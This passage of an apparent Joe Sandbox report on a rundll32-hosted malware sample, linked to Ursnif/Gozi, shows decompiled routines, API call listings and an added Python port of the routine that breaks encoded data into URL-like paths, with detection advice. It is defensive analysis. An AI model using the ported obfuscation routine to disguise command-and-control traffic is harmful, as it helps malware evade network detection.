                          				__imp__(__eax, _t37, _t41, _t29, __ecx, __ecx);   /* lstrlen(__eax), see the API list below */
                          				_t38 = __eax;                                      /* remaining input length */
                          				/* worst case adds one '/' per 8 input bytes, plus the NUL */
                          				_t30 = RtlAllocateHeap( *0x100a2d8, 0, (__eax >> 3) + __eax + 1);
                          				_v12 = _t30;
                          				if(_t30 != 0) {
                          					_v8 = _t42;                                    /* read cursor */
                          					do {
                          						_t33 = 0x18;                               /* cap = min(24, remaining) */
                          						if(_t38 <= _t33) {
                          							_t33 = _t38;
                          						}
                          						_t21 =  *0x100a2f0; // 0x8ed7dab7          /* LCG state as seen in the dump */
                          						_t23 = 0x3c6ef35f + _t21 * 0x19660d;       /* x = x * 0x19660D + 0x3C6EF35F (mod 2^32) */
                          						 *0x100a2f0 = _t23;
                          						/* low 16 bits of x modulo (cap - 8), plus 8. Note the unsigned divisor:
                          						   an input of exactly 8 bytes divides by zero, a shorter one wraps */
                          						_t45 = (_t23 & 0x0000ffff) % (_t33 + 0xfffffff8) + 8;
                          						memcpy(_t30, _v8, _t45);
                          						_v8 = _v8 + _t45;
                          						_t27 = _t30 + _t45;
                          						_t38 = _t38 - _t45;
                          						_t46 = _t46 + 0xc;                          /* caller removes memcpy's three arguments from the stack */
                          						 *_t27 = 0x2f;                              /* '/' separator */
                          						_t13 = _t27 + 1; // 0x1
                          						_t30 = _t13;                                /* write cursor after the separator */
                          					} while (_t38 > 8);
                          					memcpy(_t30, _v8, _t38 + 1);                   /* tail including the NUL */
                          				}
                          				return _v12;
                          			}
                          Statement addresses: 0x0100416a, 0x0100416d, 0x01004173, 0x0100418b, 0x0100418d, 0x01004192, 0x01004194, 0x01004197, 0x01004199, 0x0100419c, 0x0100419e, 0x0100419e, 0x010041a0, 0x010041ab, 0x010041b0, 0x010041c1, 0x010041c9, 0x010041ce, 0x010041d1, 0x010041d4, 0x010041d6, 0x010041d9, 0x010041dc, 0x010041dc, 0x010041df, 0x010041ea, 0x010041ef, 0x010041f9

                          APIs
                          • lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,01001DC6,00000000,?,75BCC740,010058D7,00000000,052995B0), ref: 0100416D
                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 01004185
                          • memcpy.NTDLL(00000000,052995B0,-00000008,?,?,?,01001DC6,00000000,?,75BCC740,010058D7,00000000,052995B0), ref: 010041C9
                          • memcpy.NTDLL(00000001,052995B0,00000001,010058D7,00000000,052995B0), ref: 010041EA
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: memcpy$AllocateHeaplstrlen
                          • String ID:
                          • API String ID: 1819133394-0
                          • Opcode ID: b99999ed161b2ff7d2532968313c6a47f42b48ac9a002b820d07c243855b6b15
                          • Instruction ID: fe64438a2795f74dc75b8cbd225616ade8659ffe089ffd7775820612abdc792f
                          • Opcode Fuzzy Hash: b99999ed161b2ff7d2532968313c6a47f42b48ac9a002b820d07c243855b6b15
                          • Instruction Fuzzy Hash: 0F1106B2A00215AFD722CB6DDC84E9A7FFEEB90261F054176F544D7181E7769E0487A0
                          Uniqueness

                          Uniqueness Score: -1.00%
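The routine E01004162 above inserts '/' separators into a string at pseudo-random positions, which is consistent with the way Ursnif/Gozi turns encoded request data into something that looks like a URL path. The following Python port is an added example, not code from the sandbox report or from the sample: it reproduces the LCG (multiplier 0x19660D, increment 0x3C6EF35F, low 16 bits used) and the chunking loop so an analyst can check the chunk-size range and the allocation bound on real input, and it includes the decoder, which is just dropping the separators. The seed 0x8ED7DAB7 is the state value the decompiler saw in the dump; the guard rejecting inputs of 8 bytes or fewer is our addition, because the original divides by (cap - 8) and would fault or wrap there.

```python
# Added example (not code from the sandbox report or from the sample): a Python
# port of the decompiled routine E01004162, written from the pseudocode above.
MULT = 0x19660D            # multiplier used at 0x010041ab
INC = 0x3C6EF35F           # increment added to the product
MASK32 = 0xFFFFFFFF
SEED_IN_DUMP = 0x8ED7DAB7  # value of the state global *0x100a2f0 in the memory dump


class Lcg:
    """32-bit linear congruential generator: x = (x * MULT + INC) mod 2**32."""

    def __init__(self, seed: int) -> None:
        self.state = seed & MASK32

    def next(self) -> int:
        self.state = (self.state * MULT + INC) & MASK32
        return self.state


def insert_separators(data: bytes, rng: Lcg, sep: bytes = b"/") -> bytes:
    """Cut `data` into chunks of pseudo-random length and join them with `sep`.

    Mirrors the decompiled loop: each chunk is 8 .. min(24, remaining) - 1 bytes,
    the loop keeps going while more than 8 bytes remain, and the tail is copied
    unchanged. The original divides by (cap - 8); for inputs of 8 bytes or fewer
    that is a divide-by-zero or an unsigned wrap, so we reject them here
    (assumption: the sample only ever feeds it longer strings).
    """
    remaining = len(data)
    if remaining <= 8:
        raise ValueError("routine requires more than 8 input bytes")
    out = bytearray()
    pos = 0
    while True:
        cap = min(24, remaining)
        chunk = (rng.next() & 0xFFFF) % (cap - 8) + 8   # 8 .. cap-1
        out += data[pos:pos + chunk]
        out += sep
        pos += chunk
        remaining -= chunk
        if remaining <= 8:
            break
    out += data[pos:]
    # The sample allocates len + len/8 + 1 bytes (NUL included); confirm the bound holds.
    assert len(out) + 1 <= len(data) + len(data) // 8 + 1
    return bytes(out)


def strip_separators(path: bytes, sep: bytes = b"/") -> bytes:
    """Undo the transformation: the separators carry no information."""
    return path.replace(sep, b"")


if __name__ == "__main__":
    sample = b"ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789abcd"   # constructed input
    encoded = insert_separators(sample, Lcg(SEED_IN_DUMP))
    print(encoded.decode())
    assert strip_separators(encoded) == sample
```

Because only the low 16 bits of the state feed the modulus, the chunk sequence depends only on the low half of the seed, and the seed itself is whatever the global held at call time, so any detection should key on the structure of the resulting path (every segment but the last is 8 to 23 characters long, the last is 1 to 8) rather than on specific segment contents.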

                          APIs
                          • GlobalFix.KERNEL32(00000000), ref: 05B7223E
                          • memset.NTDLL ref: 05B72252
                          • GetWindowThreadProcessId.USER32(00000000,?), ref: 05B7225F
                            • Part of subcall function 05B7C563: OpenProcess.KERNEL32(00000410,B8F475FF,05B72289,00000000,00000000,05B72289,0000001C,00000000,00000000,?,?,?,05B72289), ref: 05B7C5BD
                            • Part of subcall function 05B7C563: CloseHandle.KERNEL32(00000000,00000000,00000000,05B72299,00000104,?,?,?,05B72289), ref: 05B7C5DB
                            • Part of subcall function 05B7C563: GetSystemTimeAsFileTime.KERNEL32(05B72289), ref: 05B7C643
                          • GlobalUnWire.KERNEL32(00000000), ref: 05B7228A
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: GlobalProcessTime$CloseFileHandleOpenSystemThreadWindowWirememset
                          • String ID:
                          • API String ID: 3286078456-0
                          • Opcode ID: 542f64bd568c5c702c4e033c5dcc76a5d4bc2a116340fcde5367c7298278e424
                          • Instruction ID: b1583bfa4037d11704bc9529fc6c46d088fc3bcacdc9c5307027c8b6c23d6c81
                          • Opcode Fuzzy Hash: 542f64bd568c5c702c4e033c5dcc76a5d4bc2a116340fcde5367c7298278e424
                          • Instruction Fuzzy Hash: CA115175A00209ABDF11ABB5D84BBBEBFB9EB08701F145156F916F2280EF70E501CB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,00000000,00000000,00000000,00000001,?,?,?,05B6AE46,00000000,00000000), ref: 05B81C3D
                          • GetLastError.KERNEL32(?,?,?,05B6AE46,00000000,00000000,00000000,00000000,0000001E,0000001E,?,?,?,05B6EBC1,?,0000001E), ref: 05B81C45
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: ByteCharErrorLastMultiWide
                          • String ID:
                          • API String ID: 203985260-0
                          • Opcode ID: e9f58ef2cf7300a1d137e85cb72fe2a578841e5d1088add5a9efb45b4ab6be60
                          • Instruction ID: 951ab9453f2c8ce4f8fcf21639275da8ecb9368a47dd3b44516be7360be37bd0
                          • Opcode Fuzzy Hash: e9f58ef2cf7300a1d137e85cb72fe2a578841e5d1088add5a9efb45b4ab6be60
                          • Instruction Fuzzy Hash: 0901D4321092507FC730BA7A9C4CC7BBF6EEBC6760B101A59F875A7280DA20B801CA70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(?,?,?,00000000,?,?,05B61D09,?,?,?,?,?,?,?,?,?), ref: 05B627F4
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • mbstowcs.NTDLL ref: 05B6280E
                          • lstrlen.KERNEL32(?), ref: 05B62819
                          • mbstowcs.NTDLL ref: 05B62833
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 05B7BB1D
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 05B7BB29
                            • Part of subcall function 05B7BAD1: memset.NTDLL ref: 05B7BB71
                            • Part of subcall function 05B7BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 05B7BB8C
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(0000002C), ref: 05B7BBC4
                            • Part of subcall function 05B7BAD1: lstrlenW.KERNEL32(?), ref: 05B7BBCC
                            • Part of subcall function 05B7BAD1: memset.NTDLL ref: 05B7BBEF
                            • Part of subcall function 05B7BAD1: wcscpy.NTDLL ref: 05B7BC01
                            • Part of subcall function 05B7E803: RtlFreeHeap.NTDLL(00000000,?,05B73953,?,?,05B7BF5B,00000000,00000000,05B610B0,00000000,05B89F2C,00000008,00000003), ref: 05B7E80F
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Heapmbstowcsmemset$AllocateFileFindFirstFreewcscpy
                          • String ID:
                          • API String ID: 1961997177-0
                          • Opcode ID: 082751ff6ab37b1f5611a4b2f7e0e4d29ff151be31b2cebca6d2338b6562ccf7
                          • Instruction ID: e95f5dc556649fcac3722839edf12799a5534ddf85bd0f5acab7c854785c82f4
                          • Opcode Fuzzy Hash: 082751ff6ab37b1f5611a4b2f7e0e4d29ff151be31b2cebca6d2338b6562ccf7
                          • Instruction Fuzzy Hash: 2601B173A00208B7DF21ABB5CC89F9F7FACEF84650F1044A5F615A7140EA75FA1087A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetSystemTimeAsFileTime.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,05B70D10,?,00000000,00000000), ref: 05B7E04E
                          • lstrlen.KERNEL32(05FBC178,?,05B70D10,?,00000000,00000000), ref: 05B7E06F
                          • RtlAllocateHeap.NTDLL(00000000,00000014), ref: 05B7E087
                          • lstrcpy.KERNEL32(00000000,05FBC178), ref: 05B7E099
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Time$AllocateFileHeapSystemlstrcpylstrlen
                          • String ID:
                          • API String ID: 1929783139-0
                          • Opcode ID: 28a3ddff20546f842fdb7f54f4b1f3d051524a030570405ada8c1dab39223eec
                          • Instruction ID: 241c92a5805954fb480d5f7b37096fe62fa05c2c6c7a9935d5618dfcfb53f59e
                          • Opcode Fuzzy Hash: 28a3ddff20546f842fdb7f54f4b1f3d051524a030570405ada8c1dab39223eec
                          • Instruction Fuzzy Hash: 12016576904248FBC7219BA89849AAE7FBDAF49201F1440A5F916E3241DA34E505CBA1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(?), ref: 05B61B7E
                          • RtlAllocateHeap.NTDLL(00000000,00000015), ref: 05B61BA4
                          • lstrcpy.KERNEL32(00000014,?), ref: 05B61BC9
                          • memcpy.NTDLL(?,?,?), ref: 05B61BD6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeaplstrcpylstrlenmemcpy
                          • String ID:
                          • API String ID: 1388643974-0
                          • Opcode ID: c53a74e01e7b13eb8b9898080bc9dd0db2b9ffa949478b2f3592fffca12ea777
                          • Instruction ID: e43e124735621e26891a3c1624b088e7449a3fb16ba9b37f21cd5263d6d783c8
                          • Opcode Fuzzy Hash: c53a74e01e7b13eb8b9898080bc9dd0db2b9ffa949478b2f3592fffca12ea777
                          • Instruction Fuzzy Hash: 0411587150020AEFCB21CF58D884E9ABBF9FF48704F14846AF85A9B210D775F904DBA0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrlen.KERNEL32(?,765BD3B0,?,76C85520,05B6B697,00000000,?,?,?,76CDF710,00000000,00000000), ref: 05B79E17
                          • RtlAllocateHeap.NTDLL(00000000,0000000D), ref: 05B79E2F
                          • memcpy.NTDLL(0000000C,?,00000001), ref: 05B79E45
                            • Part of subcall function 05B6A8E9: StrChrA.SHLWAPI(00000020,?,765BD3B0,05FBC304,00000000,?,05B66584,?), ref: 05B6A90E
                            • Part of subcall function 05B6A8E9: StrTrimA.SHLWAPI(00000020,05B85FCC,00000000,?,05B66584,?), ref: 05B6A92D
                            • Part of subcall function 05B6A8E9: StrChrA.SHLWAPI(00000020,?,?,05B66584,?), ref: 05B6A939
                          • HeapFree.KERNEL32(00000000,00000000,0000000C,00000020,00000000), ref: 05B79E77
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateFreeTrimlstrlenmemcpy
                          • String ID:
                          • API String ID: 3208927540-0
                          • Opcode ID: dc0bbc91dba92f7087b94e5b81d92df89d268efe8b40bb02d99b938d1f627b4f
                          • Instruction ID: b776f71413b38e1044ab115993773a3aa52faafac9af389b795e7b6359ededd9
                          • Opcode Fuzzy Hash: dc0bbc91dba92f7087b94e5b81d92df89d268efe8b40bb02d99b938d1f627b4f
                          • Instruction Fuzzy Hash: 77018431644705ABD7315A52EC49F3B7FAAFB80B51F045066F65AAA080DB60B80EE660
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B69394: RtlAllocateHeap.NTDLL(00000000,?,05B70051), ref: 05B693A0
                          • RtlInitializeCriticalSection.NTDLL(05B8A400), ref: 05B75285
                          • RtlInitializeCriticalSection.NTDLL(05B8A3E0), ref: 05B7529B
                          • GetVersion.KERNEL32(?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B752AC
                          • GetModuleHandleA.KERNEL32(00001683,?,?,?,?,?,?,?,05B69100,?,?,?,?,?), ref: 05B752E0
                            • Part of subcall function 05B768AC: GetModuleHandleA.KERNEL32(?,00000001,773D9EB0,00000000,?,?,?,?,00000000,05B752C3), ref: 05B768C4
                            • Part of subcall function 05B768AC: LoadLibraryA.KERNEL32(?), ref: 05B76965
                            • Part of subcall function 05B768AC: FreeLibrary.KERNEL32(00000000), ref: 05B76970
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalHandleInitializeLibraryModuleSection$AllocateFreeHeapLoadVersion
                          • String ID:
                          • API String ID: 1711133254-0
                          • Opcode ID: 6e7cf1f51f91206b3b80c2f2b0447f3306f35e64a43bdd077b9aa88f2e071298
                          • Instruction ID: dbdad9eb23ba88487195c0b24d6759ba8dc67efffbacd10291c736cd4dba0a64
                          • Opcode Fuzzy Hash: 6e7cf1f51f91206b3b80c2f2b0447f3306f35e64a43bdd077b9aa88f2e071298
                          • Instruction Fuzzy Hash: F611A171A603049BD720AF69A886A357FA7F786230751356BF211C7280DEB87444CF40
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • RtlEnterCriticalSection.NTDLL(05B8A428), ref: 05B6253B
                          • Sleep.KERNEL32(0000000A), ref: 05B62545
                          • SetEvent.KERNEL32 ref: 05B6259C
                          • RtlLeaveCriticalSection.NTDLL(05B8A428), ref: 05B625BB
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CriticalSection$EnterEventLeaveSleep
                          • String ID:
                          • API String ID: 1925615494-0
                          • Opcode ID: 7f160632064d5bab5e6508c3f966da150e5dbdba7caad634a66869e6552a1f4f
                          • Instruction ID: 71fc14319782da1c42ff8e3695274ac02c2a772d2b7626d918d9f38343654f96
                          • Opcode Fuzzy Hash: 7f160632064d5bab5e6508c3f966da150e5dbdba7caad634a66869e6552a1f4f
                          • Instruction Fuzzy Hash: 6E014075654204BBEB20AB61DC5BF7A7EABEB04751F405052F606D71C0DA78BA04CBA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 05B80DDD: lstrlen.KERNEL32(?,?,00000000,05B67BEE), ref: 05B80DE2
                            • Part of subcall function 05B80DDD: RtlAllocateHeap.NTDLL(00000000,-0000000C), ref: 05B80DF7
                            • Part of subcall function 05B80DDD: wsprintfA.USER32 ref: 05B80E13
                            • Part of subcall function 05B80DDD: HeapFree.KERNEL32(00000000,00000000,00000000,000000FF), ref: 05B80E2F
                          • CreateFileA.KERNEL32(?,80000000,00000003,00000000,00000003,00000080,00000000), ref: 05B67C06
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 05B67C15
                          • CloseHandle.KERNEL32(00000000), ref: 05B67C1F
                          • GetLastError.KERNEL32 ref: 05B67C27
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: FileHeap$AllocateCloseCreateErrorFreeHandleLastSizelstrlenwsprintf
                          • String ID:
                          • API String ID: 4042893638-0
                          • Opcode ID: 47fa9e7774320ee262521eb46151581537cf72ac35ebbead0ac8ea7b62a22e2f
                          • Instruction ID: c2ea553509ccb97a82db5cf7950c12cf0f0b42fc8566f2a03c2d91e9e8ab1c36
                          • Opcode Fuzzy Hash: 47fa9e7774320ee262521eb46151581537cf72ac35ebbead0ac8ea7b62a22e2f
                          • Instruction Fuzzy Hash: A3F0D172204218BBD7202E69DC8DFAB7F6EFF056A1F205115F90AA2080DE38A540C6E1
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • InterlockedExchange.KERNEL32(05B8A060,00000000), ref: 05B68906
                          • RtlAllocateHeap.NTDLL(00000000,0000002A), ref: 05B68921
                          • lstrcpy.KERNEL32(00000000,?), ref: 05B6894A
                          • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 05B6896B
                            • Part of subcall function 05B6DC41: SetEvent.KERNEL32(00000000,?,05B7507B), ref: 05B6DC56
                            • Part of subcall function 05B6DC41: WaitForSingleObject.KERNEL32(?,000000FF,?,?,05B7507B), ref: 05B6DC76
                            • Part of subcall function 05B6DC41: CloseHandle.KERNEL32(00000000,?,05B7507B), ref: 05B6DC7F
                            • Part of subcall function 05B6DC41: CloseHandle.KERNEL32(00000000,?,?,05B7507B), ref: 05B6DC89
                            • Part of subcall function 05B6DC41: RtlEnterCriticalSection.NTDLL(?), ref: 05B6DC91
                            • Part of subcall function 05B6DC41: RtlLeaveCriticalSection.NTDLL(?), ref: 05B6DCA9
                            • Part of subcall function 05B6DC41: CloseHandle.KERNEL32(00000000), ref: 05B6DCC5
                            • Part of subcall function 05B6DC41: LocalFree.KERNEL32(?), ref: 05B6DCD0
                            • Part of subcall function 05B6DC41: RtlDeleteCriticalSection.NTDLL(?), ref: 05B6DCDA
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CloseCriticalHandleSection$FreeHeap$AllocateDeleteEnterEventExchangeInterlockedLeaveLocalObjectSingleWaitlstrcpy
                          • String ID:
                          • API String ID: 1103286547-0
                          • Opcode ID: 9b3c4b42a36dfaba9bf4ce065173bc5c81d594d2c68071aed84f61195a77d655
                          • Instruction ID: ac87ba3800ee5527cc874f1efe5ce8e6225e88c4f48a53639b05b5d64f529e6e
                          • Opcode Fuzzy Hash: 9b3c4b42a36dfaba9bf4ce065173bc5c81d594d2c68071aed84f61195a77d655
                          • Instruction Fuzzy Hash: A3F0C2323502117BDB302A25EC0FF663F6AEB81B31F142051B605EB2C0DE69B805D7A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • lstrcatW.KERNEL32(?,?), ref: 05B74A5D
                            • Part of subcall function 05B6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000,?,?,00000000,00001000), ref: 05B6F3DB
                            • Part of subcall function 05B6F39B: GetLastError.KERNEL32 ref: 05B6F3E5
                            • Part of subcall function 05B6F39B: WaitForSingleObject.KERNEL32(000000C8), ref: 05B6F40A
                            • Part of subcall function 05B6F39B: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,?,00000080,00000000), ref: 05B6F42D
                            • Part of subcall function 05B6F39B: SetFilePointer.KERNEL32(00001000,00000000,00000000,00000002), ref: 05B6F455
                            • Part of subcall function 05B6F39B: WriteFile.KERNEL32(00001000,00001388,?,?,00000000), ref: 05B6F46A
                            • Part of subcall function 05B6F39B: SetEndOfFile.KERNEL32(00001000), ref: 05B6F477
                            • Part of subcall function 05B6F39B: CloseHandle.KERNEL32(00001000), ref: 05B6F48F
                          • WaitForSingleObject.KERNEL32(00002710,?,00001000,?,00000005,?,05B6E4AF,?,?,00001000,?,?,00001000), ref: 05B74A80
                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000,?,05B6E4AF,?,?,00001000,?,?,00001000), ref: 05B74AA2
                          • GetLastError.KERNEL32(?,05B6E4AF,?,?,00001000,?,?,00001000), ref: 05B74AB6
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: File$Create$ErrorLastObjectSingleWait$CloseHandlePointerWritelstrcat
                          • String ID:
                          • API String ID: 3370347312-0
                          • Opcode ID: 7b891ad2d8db149b465d88c9190cbfb1434dc3068946f9a0c00ffb7daeb792cd
                          • Instruction ID: d73337ff2b38083d841eaebc7513cb6ceb2895bde6b4119e0efa64c2c56f15c1
                          • Opcode Fuzzy Hash: 7b891ad2d8db149b465d88c9190cbfb1434dc3068946f9a0c00ffb7daeb792cd
                          • Instruction Fuzzy Hash: 93F04F31244608FBDF219F60AC0AF7A3E67FF05711F200114FA12AA1E0EB71B561DBA9
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • memset.NTDLL ref: 05B7D601
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,05B6DB8C,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 05B7D616
                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,05B63EC6,?,?), ref: 05B7D623
                          • CloseHandle.KERNEL32(?,?,?,?,05B63EC6,?,?), ref: 05B7D635
                          Memory Dump Source
                          • Source File: 00000003.00000002.511055251.0000000005B60000.00000040.10000000.00040000.00000000.sdmp, Offset: 05B60000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_5b60000_rundll32.jbxd
                          Yara matches
                          Similarity
                          • API ID: CreateEvent$CloseHandlememset
                          • String ID:
                          • API String ID: 2812548120-0
                          • Opcode ID: 1e9cbbe9ec67b48f98e2111ca2f0099a269ca46a05d5b1ed9a873c46af977fe8
                          • Instruction ID: 07a84c00b3dce76012e5aacab934ae1d4091009500d886fbaad000b70bd3e881
                          • Opcode Fuzzy Hash: 1e9cbbe9ec67b48f98e2111ca2f0099a269ca46a05d5b1ed9a873c46af977fe8
                          • Instruction Fuzzy Hash: 79F05EB510430C7FD3206F26DCC4C27BFEDFF56298B11496EF15682141CA71F8058A64
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 100%
                          			// Initialises a 0x38-byte context block at __esi with two manual-reset events
                          			// (CreateEventA with bManualReset = 1): the event stored at +0x1c starts
                          			// non-signaled, the one at +0x20 starts signaled. Returns 1 on success and 0 on
                          			// failure; if the second CreateEventA fails, the first event is closed again.
                          			E0100227F(void* __esi) {
                          				struct _SECURITY_ATTRIBUTES* _v4; // decompiler-assigned type; holds the 0/1 result
                          				void* _t8;
                          				void* _t10;
                          
                          				_v4 = 0;
                          				memset(__esi, 0, 0x38);
                          				_t8 = CreateEventA(0, 1, 0, 0); // manual reset, initially non-signaled
                          				 *(__esi + 0x1c) = _t8;
                          				if(_t8 != 0) {
                          					_t10 = CreateEventA(0, 1, 1, 0); // manual reset, initially signaled
                          					 *(__esi + 0x20) = _t10;
                          					if(_t10 == 0) {
                          						CloseHandle( *(__esi + 0x1c)); // roll back the first event
                          					} else {
                          						_v4 = 1;
                          					}
                          				}
                          				return _v4;
                          			}

                          APIs
                          • memset.NTDLL ref: 0100228D
                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,76CC81D0,00000000,00000000), ref: 010022A2
                          • CreateEventA.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 010022AF
                          • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,0100593D,00000000,?), ref: 010022C1
                          Memory Dump Source
                          • Source File: 00000003.00000002.508498284.0000000001001000.00000020.10000000.00040000.00000000.sdmp, Offset: 01000000, based on PE: true
                          • Associated: 00000003.00000002.508474760.0000000001000000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508523547.0000000001009000.00000002.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508540303.000000000100A000.00000004.10000000.00040000.00000000.sdmp
                          • Associated: 00000003.00000002.508574366.000000000100C000.00000002.10000000.00040000.00000000.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_3_2_1000000_rundll32.jbxd
                          Similarity
                          • API ID: CreateEvent$CloseHandlememset
                          • String ID:
                          • API String ID: 2812548120-0
                          • Opcode ID: 7889234dc81e934937a0a035855a81381ae41a736ce7f101b8928bdeb58a69fe
                          • Instruction ID: 4f997f0634414085f36d5cfea56143d19d908c1e0a0bcff07f9ba5edbeaf6ed8
                          • Opcode Fuzzy Hash: 7889234dc81e934937a0a035855a81381ae41a736ce7f101b8928bdeb58a69fe
                          • Instruction Fuzzy Hash: C6F05EB11047087FE321AF66DCC4C2BFBECEB461A8F11892EF18692141C676A8088F70
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • CreateFileA.KERNEL32(C0000000,00000000,00000000,00000003,40000000,00000000,00000001,0000003A,05B64BD6,000000FF,05FBB7F0,?,?,05B7B7F2,0000003A,05FBB7F0), ref: 05B74AE0
                          • GetLastError.KERNEL32(?,?,05B7B7F2,0000003A,05FBB7F0,?,05B7A2EB,00000001,?,00000000,00000000,00000000,?,05B6109E,05B89F2C,00000008), ref: 05B74AEB
                          • WaitNamedPipeA.KERNEL32(00002710), ref: 05B74B0D
                          • WaitForSingleObject.KERNEL32(00000000,?,?,05B7B7F2,0000003A,05FBB7F0,?,05B7A2EB,00000001,?,00000000,00000000,00000000,?,05B6109E,05B89F2C), ref: 05B74B1B
                          Memory Dump Source
